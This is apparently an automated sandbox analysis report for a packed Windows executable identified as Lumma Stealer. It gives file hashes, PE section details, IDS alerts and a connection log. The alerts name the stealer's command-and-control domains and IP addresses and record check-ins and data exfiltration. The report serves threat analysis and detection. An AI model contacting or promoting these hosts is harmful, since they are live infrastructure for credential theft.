                                                                                                                                                                                                                                                              File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                              Size (bytes):15427
                                                                                                                                                                                                                                                              Entropy (8bit):7.784472070227724
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:384:CKKdvwj3SJMpKKKKKKKKikCyKwqHILyPGQV4ykihKKKKKKKCm:CKKdvMMgKKKKKKKKiqB3yPVXkihKKKKI
                                                                                                                                                                                                                                                              MD5:3062488F9D119C0D79448BE06ED140D8
                                                                                                                                                                                                                                                              SHA1:8A148951C894FC9E968D3E46589A2E978267650E
                                                                                                                                                                                                                                                              SHA-256:C47A383DE6DD60149B37DD24825D42D83CB48BE0ED094E3FC3B228D0A7BB9332
                                                                                                                                                                                                                                                              SHA-512:00BBA6BCBFBF44B977129594A47F732809DCE7D4E2D22D050338E4EEA91FCC02A9B333C45EEB4C9024DF076CBDA0B46B621BF48309C0D037D19BBEAE0367F5ED
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-recommended-changes.png
                                                                                                                                                                                                                                                              Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..;.IDATx^..].u.Y..M....B.X...".......@.ZzSys..,H{.Rz!... .......WM.IN..9n..I....g...p<P.0*-....|...X..s...Z.Y{....w..5.._s..x...E.......... ......*............... ......*............{....2. ...`.$h.......)....,T-x.5......,.."..(.A.......>.. ...`..*....4..G.|.....,T-..'. ...`....]........?~.....A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.}P../}....TJ...'.O...'?......XH...K..>.b..K/t...o.......T.._.E.....q.$.x..qJ......mo...ww.}.{....W..._...._.^z...........(^x..C..P.../.........U..]../u.....w..{.O.N..o.l........_.^...2.....*....<...iP.W...o......]..+.?}c...t!.....p.=..._x..._yo....?....~u.c?.c1'.....{.^.}.S...5.yMx./.>.lwqq.}.....g..g1wZ..%......h.i[..%ul.&..U.k..";7-.9.6...s..s..0.......}.s..?...c..X...|..........>.x..o.?.?..{........n..o....]?....Ej..yuu5...A.}....5...^...f........s.qJ..SYF.V...'..q.......T..'..z.....
                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (52717), with no line terminators
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):52717
                                                                                                                                                                                                                                                              Entropy (8bit):5.462668685745912
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:1536:tjspYRrxlhd0fq3agV3IcgPPPI3r7DAQHCloIB3Tj7xHw:tjZLCtxQ
                                                                                                                                                                                                                                                              MD5:413FCC759CC19821B61B6941808B29B5
                                                                                                                                                                                                                                                              SHA1:1AD23B8A202043539C20681B1B3E9F3BC5D55133
                                                                                                                                                                                                                                                              SHA-256:DAF7759FEDD9AF6C4D7E374B0D056547AE7CB245EC24A1C4ACF02932F30DC536
                                                                                                                                                                                                                                                              SHA-512:E9BF8A74FEF494990AAFD15A0F21E0398DC28B4939C8F9F8AA1F3FFBD18056C8D1AB282B081F5C56F0928C48E30E768F7E347929304B55547F9CA8C1AABD80B8
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e,t,n){o.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:n})},o.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},o.t=function(e,t){if(1&t&&(e=o(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var n=Object.create(null);if(o.r(n),Object.defineProperty(n,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var r in e)o.d(n,r,function(t){return e[t]}.bind(null,r));return n},o.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return o.d(t,"a",t),t},o.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},o.p="",o(o.s=3)}([function(e,t,o)
                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                              Size (bytes):1432
                                                                                                                                                                                                                                                              Entropy (8bit):4.986131881931089
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:24:TGAcSRrEV4YUmjiqIWD5bfD9yRSmkYR/stZLKvVqXRRlAfr6VXBAuU:Ti4IV4YUmjiqr9bfskAmZTXGfSXqh
                                                                                                                                                                                                                                                              MD5:6B8763B76F400DC480450FD69072F215
                                                                                                                                                                                                                                                              SHA1:6932907906AFCF8EAFA22154D8478106521BC9EE
                                                                                                                                                                                                                                                              SHA-256:3FB84D357F0C9A66100570EDD62A04D0574C45E8A5209A3E6870FF22AF839DFC
                                                                                                                                                                                                                                                              SHA-512:8A07EBB806A0BA8EF54B463BD6AF37C77A10C1FA38A57128FD90FCB2C16DF71CE697D4FE65C623E5C6054C5715975831C36861D5574F59DF28836D9BC2B0BC22
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              URL:https://learn.microsoft.com/static/assets/0.4.028726178/global/deprecation.js
                                                                                                                                                                                                                                                              Preview:// ES5 script for back compat with unsupported browsers..!(function () {..'use strict';..// Keep in sync with environment/browser.ts..var supportedBrowser =...typeof Blob === 'function' &&...typeof PerformanceObserver === 'function' &&...typeof Intl === 'object' &&...typeof MutationObserver === 'function' &&...typeof URLSearchParams === 'function' &&...typeof WebSocket === 'function' &&...typeof IntersectionObserver === 'function' &&...typeof queueMicrotask === 'function' &&...typeof TextEncoder === 'function' &&...typeof TextDecoder === 'function' &&...typeof customElements === 'object' &&...typeof HTMLDetailsElement === 'function' &&...typeof AbortController === 'function' &&...typeof AbortSignal === 'function' &&...'entries' in FormData.prototype &&...'toggleAttribute' in Element.prototype &&...'replaceChildren' in Element.prototype &&...// ES2019...'fromEntries' in Object &&...'flatMap' in Array.prototype &&...'trimEnd' in String.prototype &&...// ES2020...'allSettled' in Promise &
                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (52717), with no line terminators
                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                              Size (bytes):52717
                                                                                                                                                                                                                                                              Entropy (8bit):5.462668685745912
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:1536:tjspYRrxlhd0fq3agV3IcgPPPI3r7DAQHCloIB3Tj7xHw:tjZLCtxQ
                                                                                                                                                                                                                                                              MD5:413FCC759CC19821B61B6941808B29B5
                                                                                                                                                                                                                                                              SHA1:1AD23B8A202043539C20681B1B3E9F3BC5D55133
                                                                                                                                                                                                                                                              SHA-256:DAF7759FEDD9AF6C4D7E374B0D056547AE7CB245EC24A1C4ACF02932F30DC536
                                                                                                                                                                                                                                                              SHA-512:E9BF8A74FEF494990AAFD15A0F21E0398DC28B4939C8F9F8AA1F3FFBD18056C8D1AB282B081F5C56F0928C48E30E768F7E347929304B55547F9CA8C1AABD80B8
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              URL:https://wcpstatic.microsoft.com/mscc/lib/v2/wcp-consent.js
                                                                                                                                                                                                                                                              Preview:var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e,t,n){o.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:n})},o.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},o.t=function(e,t){if(1&t&&(e=o(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var n=Object.create(null);if(o.r(n),Object.defineProperty(n,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var r in e)o.d(n,r,function(t){return e[t]}.bind(null,r));return n},o.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return o.d(t,"a",t),t},o.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},o.p="",o(o.s=3)}([function(e,t,o)
                                                                                                                                                                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                              Entropy (8bit):7.947465920853795
                                                                                                                                                                                                                                                              TrID:
                                                                                                                                                                                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                              File name:file.exe
                                                                                                                                                                                                                                                              File size:1'871'360 bytes
                                                                                                                                                                                                                                                              MD5:bc5d8c5f778dff8422725d4ae10dd393
                                                                                                                                                                                                                                                              SHA1:be5ec2c6eaf85347ff6b7eb450faadb58a852476
                                                                                                                                                                                                                                                              SHA256:073ec2fc8f0451ea19d87dd8ee533ab1f2de836b8c624e9801546e9a0faeb629
                                                                                                                                                                                                                                                              SHA512:dc25b24490066d579a3a5f8be91ea0bec39bb5ed4ef326ef8dcc256b1426c76f67e64b3029e4c58a41cce8caf6ad028c85d7b63c5b6e0821ecbe62d2a4b333d8
                                                                                                                                                                                                                                                              SSDEEP:49152:AkMNEz7gxyN75xmxVFwtmojuMY6AMnoTG3:Pz78eiQtmojuMYzMnoTG3
                                                                                                                                                                                                                                                              TLSH:FC85337BAA1961A2CB4B46F3C12F7C5D5B695F9EF00166ABC242D0D7B2F13D83809E14
                                                                                                                                                                                                                                                              File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....Eg.............................`J...........@...........................J.....^.....@.................................\...p..
                                                                                                                                                                                                                                                              Icon Hash:90cececece8e8eb0
                                                                                                                                                                                                                                                              Entrypoint:0x8a6000
                                                                                                                                                                                                                                                              Entrypoint Section:.taggant
                                                                                                                                                                                                                                                              Digitally signed:false
                                                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                                                              Subsystem:windows gui
                                                                                                                                                                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                              Time Stamp:0x67450895 [Mon Nov 25 23:30:29 2024 UTC]
                                                                                                                                                                                                                                                              TLS Callbacks:
                                                                                                                                                                                                                                                              CLR (.Net) Version:
                                                                                                                                                                                                                                                              OS Version Major:6
                                                                                                                                                                                                                                                              OS Version Minor:0
                                                                                                                                                                                                                                                              File Version Major:6
                                                                                                                                                                                                                                                              File Version Minor:0
                                                                                                                                                                                                                                                              Subsystem Version Major:6
                                                                                                                                                                                                                                                              Subsystem Version Minor:0
                                                                                                                                                                                                                                                              Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                                                                                                                                                                                                                              Instruction
                                                                                                                                                                                                                                                              jmp 00007F0820B0DDDAh
                                                                                                                                                                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x5805c0x70.idata
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x570000x2b0.rsrc
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x581f80x8.idata
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                              0x10000x560000x25c002476c157cd4eb2c8eda7a2bc488dec85False0.998124482615894data7.967768582500497IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                              .rsrc0x570000x2b00x200c8f4fe0a80100cc5b7acee277a3be1e5False0.802734375data6.067394116923916IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                              .idata 0x580000x10000x200c92ced077364b300efd06b14c70a61dcFalse0.15625data1.1194718105633323IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                              0x590000x2ac0000x200121a94aee6598822943629d4843a568eunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                              avuktrbe0x3050000x1a00000x19f400cb99cf54adc7ea091daabf71d99ffe18False0.9943881462597832data7.954201496831324IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                              hcoakmjd0x4a50000x10000x600b717b9e1a47c91e287033c8a4c8e9c42False0.5455729166666666data4.836705332212292IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                              .taggant0x4a60000x30000x22003a994520ee59c5aba7914e584b2ac47bFalse0.006433823529411764DOS executable (COM)0.019571456231530684IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                              RT_MANIFEST0x4a40940x256ASCII text, with CRLF line terminators0.5100334448160535
                                                                                                                                                                                                                                                              DLLImport
                                                                                                                                                                                                                                                              kernel32.dlllstrcpy
                                                                                                                                                                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                              2024-11-27T16:31:18.043771+01002057836ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (property-imper .sbs)1192.168.2.10571171.1.1.153UDP
                                                                                                                                                                                                                                                              2024-11-27T16:31:18.273613+01002057818ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (frogs-severz .sbs)1192.168.2.10522511.1.1.153UDP
                                                                                                                                                                                                                                                              2024-11-27T16:31:18.514044+01002057830ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (occupy-blushi .sbs)1192.168.2.10521391.1.1.153UDP
                                                                                                                                                                                                                                                              2024-11-27T16:31:18.751542+01002057812ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (blade-govern .sbs)1192.168.2.10553281.1.1.153UDP
                                                                                                                                                                                                                                                              2024-11-27T16:31:19.100815+01002057842ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (story-tense-faz .sbs)1192.168.2.10604761.1.1.153UDP
                                                                                                                                                                                                                                                              2024-11-27T16:31:19.456494+01002057824ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (leg-sate-boat .sbs)1192.168.2.10507271.1.1.153UDP
                                                                                                                                                                                                                                                              2024-11-27T16:31:19.685731+01002057814ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (disobey-curly .sbs)1192.168.2.10630721.1.1.153UDP
                                                                                                                                                                                                                                                              2024-11-27T16:31:19.938235+01002057826ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (motion-treesz .sbs)1192.168.2.10584771.1.1.153UDP
                                                                                                                                                                                                                                                              2024-11-27T16:31:20.292125+01002057834ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (powerful-avoids .sbs)1192.168.2.10530421.1.1.153UDP
                                                                                                                                                                                                                                                              2024-11-27T16:31:22.381067+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049708104.121.10.34443TCP
                                                                                                                                                                                                                                                              2024-11-27T16:31:23.292631+01002858666ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup1192.168.2.1049708104.121.10.34443TCP
                                                                                                                                                                                                                                                              2024-11-27T16:31:23.452892+01002057415ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (marshal-zhukov .com)1192.168.2.10594581.1.1.153UDP
                                                                                                                                                                                                                                                              2024-11-27T16:31:24.990177+01002057416ET MALWARE Observed Win32/Lumma Stealer Related Domain (marshal-zhukov .com in TLS SNI)1192.168.2.1049715172.67.160.80443TCP
                                                                                                                                                                                                                                                              2024-11-27T16:31:24.990177+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049715172.67.160.80443TCP
                                                                                                                                                                                                                                                              2024-11-27T16:31:27.785745+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.1049715172.67.160.80443TCP
                                                                                                                                                                                                                                                              2024-11-27T16:31:27.785745+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.1049715172.67.160.80443TCP
                                                                                                                                                                                                                                                              2024-11-27T16:31:29.076926+01002057416ET MALWARE Observed Win32/Lumma Stealer Related Domain (marshal-zhukov .com in TLS SNI)1192.168.2.1049724172.67.160.80443TCP
                                                                                                                                                                                                                                                              2024-11-27T16:31:29.076926+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049724172.67.160.80443TCP
                                                                                                                                                                                                                                                              2024-11-27T16:31:31.357112+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.1049724172.67.160.80443TCP
                                                                                                                                                                                                                                                              2024-11-27T16:31:31.357112+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.1049724172.67.160.80443TCP
                                                                                                                                                                                                                                                              2024-11-27T16:31:33.171370+01002057416ET MALWARE Observed Win32/Lumma Stealer Related Domain (marshal-zhukov .com in TLS SNI)1192.168.2.1049734172.67.160.80443TCP
                                                                                                                                                                                                                                                              2024-11-27T16:31:33.171370+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049734172.67.160.80443TCP
                                                                                                                                                                                                                                                              2024-11-27T16:31:36.321557+01002057416ET MALWARE Observed Win32/Lumma Stealer Related Domain (marshal-zhukov .com in TLS SNI)1192.168.2.1049744172.67.160.80443TCP
                                                                                                                                                                                                                                                              2024-11-27T16:31:36.321557+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049744172.67.160.80443TCP
                                                                                                                                                                                                                                                              2024-11-27T16:31:39.205216+01002057416ET MALWARE Observed Win32/Lumma Stealer Related Domain (marshal-zhukov .com in TLS SNI)1192.168.2.1049754172.67.160.80443TCP
                                                                                                                                                                                                                                                              2024-11-27T16:31:39.205216+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049754172.67.160.80443TCP
                                                                                                                                                                                                                                                              2024-11-27T16:31:43.891261+01002057416ET MALWARE Observed Win32/Lumma Stealer Related Domain (marshal-zhukov .com in TLS SNI)1192.168.2.1049764172.67.160.80443TCP
                                                                                                                                                                                                                                                              2024-11-27T16:31:43.891261+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049764172.67.160.80443TCP
                                                                                                                                                                                                                                                              2024-11-27T16:31:45.776518+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.1049764172.67.160.80443TCP
                                                                                                                                                                                                                                                              2024-11-27T16:31:47.457733+01002057416ET MALWARE Observed Win32/Lumma Stealer Related Domain (marshal-zhukov .com in TLS SNI)1192.168.2.1049771172.67.160.80443TCP
                                                                                                                                                                                                                                                              2024-11-27T16:31:47.457733+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049771172.67.160.80443TCP
                                                                                                                                                                                                                                                              2024-11-27T16:31:53.356823+01002057416ET MALWARE Observed Win32/Lumma Stealer Related Domain (marshal-zhukov .com in TLS SNI)1192.168.2.1049783172.67.160.80443TCP
                                                                                                                                                                                                                                                              2024-11-27T16:31:53.356823+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049783172.67.160.80443TCP
                                                                                                                                                                                                                                                              2024-11-27T16:31:55.747606+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.1049783172.67.160.80443TCP
                                                                                                                                                                                                                                                              2024-11-27T16:31:57.259904+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.1049792185.215.113.1680TCP
                                                                                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:11.920083046 CET49671443192.168.2.10204.79.197.203
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:12.966917038 CET49674443192.168.2.10173.222.162.55
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:12.967009068 CET49675443192.168.2.10173.222.162.55
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:15.654736042 CET49677443192.168.2.1020.42.65.85
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:15.966866970 CET49677443192.168.2.1020.42.65.85
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:16.576253891 CET49677443192.168.2.1020.42.65.85
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:16.732590914 CET49671443192.168.2.10204.79.197.203
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:17.779356956 CET49677443192.168.2.1020.42.65.85
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:18.454471111 CET49707443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:18.454508066 CET4434970713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:18.454561949 CET49707443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:18.454843998 CET49707443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:18.454864025 CET4434970713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:20.185575962 CET49677443192.168.2.1020.42.65.85
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:20.211123943 CET4434970713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:20.211194992 CET49707443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:20.215193987 CET49707443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:20.215209007 CET4434970713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:20.216032982 CET4434970713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:20.226015091 CET49707443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:20.267342091 CET4434970713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:20.684284925 CET4434970713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:20.684305906 CET4434970713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:20.684319973 CET4434970713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:20.684371948 CET49707443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:20.684403896 CET4434970713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:20.684417963 CET49707443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:20.684448004 CET49707443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:20.861722946 CET4434970713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:20.861747026 CET4434970713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:20.861844063 CET49707443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:20.861866951 CET4434970713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:20.862023115 CET49707443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:20.893897057 CET49708443192.168.2.10104.121.10.34
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:20.893944979 CET44349708104.121.10.34192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:20.894059896 CET49708443192.168.2.10104.121.10.34
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:20.895471096 CET49708443192.168.2.10104.121.10.34
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:20.895487070 CET44349708104.121.10.34192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:20.906779051 CET4434970713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:20.906799078 CET4434970713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:20.907008886 CET49707443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:20.907027960 CET4434970713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:20.907211065 CET49707443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:21.030070066 CET4434970713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:21.030092955 CET4434970713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:21.030170918 CET49707443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:21.030195951 CET4434970713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:21.030363083 CET49707443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:21.058140039 CET4434970713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:21.058163881 CET4434970713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:21.058284044 CET49707443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:21.058309078 CET4434970713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:21.058448076 CET49707443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:21.082377911 CET4434970713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:21.082396984 CET4434970713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:21.082505941 CET49707443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:21.082519054 CET4434970713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:21.082556009 CET49707443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:21.101497889 CET4434970713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:21.101528883 CET4434970713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:21.101600885 CET49707443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:21.101617098 CET4434970713.107.246.43192.168.2.10
